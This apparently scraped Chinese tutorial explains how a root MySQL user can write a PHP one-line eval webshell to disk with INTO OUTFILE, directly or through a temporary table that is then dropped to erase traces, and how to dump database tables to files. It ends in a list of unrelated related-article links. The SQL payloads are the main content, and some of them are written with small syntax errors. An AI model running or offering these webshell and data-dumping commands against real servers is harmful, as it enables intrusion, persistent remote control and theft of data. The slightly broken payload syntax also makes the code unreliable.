0x00 前提条件

权限: 必须是ROOT
secure_file_priv的限制
可以使用 mysql命令查询 show variables like '%secure%’;

secure_file_priv的值为null ,表示限制mysqld 不允许导入|导出
secure_file_priv的值为/tmp/ ,表示限制mysqld 的导入|导出只能发生在/tmp/目录下
secure_file_priv的值没有具体值时,表示不对mysqld 的导入|导出做限制

0x01 写入Websehll

  • 利用函数
  • - into dumpfile()
  • - into outfile()
  • - load_file()

01. 直接写入

注意:这个方法必须得是ROOT用户权限

  select '<php eval($_POST[shell])?>' into outfile 'c:\\shell.php'

02. 创建表单写入

1.先创建数据表

CREATE  table 'mysql'.'shell' ('webshell'  text not null)

2.向表单中写入一句话

insert Into  mysql.shell  values('<?php $eval($_POST[shell]);?>');

3.查询数据导出webshell

select 'webshell' from 'shell'  into outfile 'c:\\1.php'

4.删除表,清理痕迹。

drop table if exists 'shell'

0x02 脱库

0x1 Into outfile

select * from test into outfile '/tmp/test.txt'

0x2 Into dumpfile

 select * from test into dumpfile '/tmp/test.txt'

0x3 outfile 与dumpfile的脱裤区别

1.dumpfile只输出一行内容,outfile多行。
2.outfile函数在将数据写入到文件时会进行特殊格式转换 例如\n,则dumpfile则保持原数据格式。

MYSQL数据库脱库写马写一句话相关推荐

  1. MySql数据库从库同步的延迟问题及解决方案

    1).MySQL数据库主从同步延迟原理mysql主从同步原理: 主库针对写操作,顺序写binlog,从库单线程去主库顺序读"写操作的binlog",从库取到binlog在本地原样执 ...

  2. mysql数据库合库数据库合并心得

    mysql数据库合库数据库合并心得 要区分表的主键类型和有无外键 1.自增主键+ 外键相关表 2.uuid + 外键相关表 3.没有外键的自增表 4.没有外键的uuid表 5.没有外键的自增表无数据 ...

  3. mysql数据库题库和答案2016_2016最新计算机三级MySQL数据库题库(含答案)

    2016最新计算机三级MySQL数据库题库(含答案) 一.选择题 1.可用于从表或视图中检索数据的SQL语句是________. A.SELECT语句 B.INSERT语句 C.UPDATE语句 D. ...

  4. mysql数据库男和女怎么写命令_【MySQL】MySQL数据库操作命令大全

    1.创建数据库:create database Thinkgamer; 2.删除数据库:drop database Thinkgamer; 3.选择使用某个数据库:use Thinkgamer; 4. ...

  5. MySQL数据库题库

    一.选择题 第1章 数据库系统概述 1.DBS是(  A )的简写. A.数据库系统  B.数据库管理系统    C.数据库   D.操作系统 2.DBMS是(  B   )的简写 A.数据库系统  ...

  6. mysql数据库建库建表

    mysql语言规则:1.关键字和函数名称全部大写 2.数据库名称,表名称,字段名称全部小写 1.进入mysql数据库,可通过mysql安装的客户端进入,打开客户端输入密码,即进入数据库 2.通过命令提 ...

  7. mysql数据库应用题库_MySQL数据库及应用题库附答案

    版权声明:以上文章中所选用的图片及文字来源于网络以及用户投稿,由于未联系到知识产权人或未发现有关知识产权的登记,如有知识产权人并不愿意我们使用,如果有侵权请立即联系:55525090@qq.com,我 ...

  8. mysql数据库应用题库_MySQL数据库及应用题库附参考答案.docx

    MySQL数据库及应用题库附参考答案.docx MySQLMySQL 数据库及应用题库附数据库及应用题库附参考参考答案答案 仅供参考 第一章测验 1 单选 计算机进行数据处理经历了从低级到高级的 __ ...

  9. mysql数据库应用题库_MySQL数据库设计与应用章节考试题库

    MySQL数据库设计与应用章节考试题库 更多相关问题 [单选] 8岁女性患者,因外伤后致右胫骨骨折,下列描述正确的是() [判断题] 开放性骨折处理原则是及时处理创口,尽可能防止感染,力争将开放性骨折 ...

  10. mysql数据库添加数据语句怎么写_mysql中多种插入数据的语句

    摘抄自:https://yjclsx.blog.csdn.net/article/details/83898545 mysql中常用的三种插入数据的语句 insert into表示插入数据,数据库会检 ...

最新文章

  1. SAP Fiori Elements List Report table 里的普通按钮,Global 按钮 和 Determining 按钮
  2. 不允许使用java方式启动_细品 Java 中启动线程的正确和错误方式
  3. 直播丨墨天轮邂逅MySQL之父,腾讯云CDB/CynosDB技术揭秘之自主可控、前沿探索
  4. 内存溢出和内存泄漏的区别,产生原因以及解决方案
  5. 引用当前网站集下的样式文件
  6. ie浏览器float right 向下错位解决办法
  7. 桌面计算机打不开win8.1,Win8.1怎么进桌面 2种Win8.1开机直接进桌面方法
  8. 【C语言】07-基本语句和运算
  9. C语言小编程之九九乘法表
  10. IEEE MAC地址分配
  11. 触摸屏驱动学习并移植
  12. python串口调试助手_python 串口调试工具源码
  13. 视频教程-VBScript脚本语言编程与自动化运维操作学习篇-其他
  14. kindle型号查询
  15. 国际化批量获取en-US.json,zn-CN.json字典内容
  16. 中国学的哲学概念“道、法、术、势”怎么理解 [转]
  17. 【演示文稿制作软件】Focusky教程 | 贯穿整个演示文稿背景音乐的添加与设置
  18. excel交集和并集的意思_几个excel如何求并集
  19. 中央C-高低音谱号里的中央C和其它音节
  20. android 应用自启管理

热门文章

  1. 面试官:说说Java反射机制
  2. Java+SSM+Jsp+Mysql项目大学生健康管理系统
  3. 犀牛插件开发-插件兼容性-Rhino插件-什么是Rhino插件
  4. 华为荣耀10电路原理图
  5. 【备注】【C14】《HeadFirstJava(中文版)(第2版)》 PDF 下载
  6. flash mx拖拽实例_Flash MX 2004的“扭曲和渐变”命令
  7. C++模拟鼠标移动及单击实现代码
  8. 统计自然语言处理——信息论基础
  9. 金蝶kis仓库管理系统演示_金蝶KIS操作流程
  10. PSP3000破解原理——缓冲区溢出漏洞随谈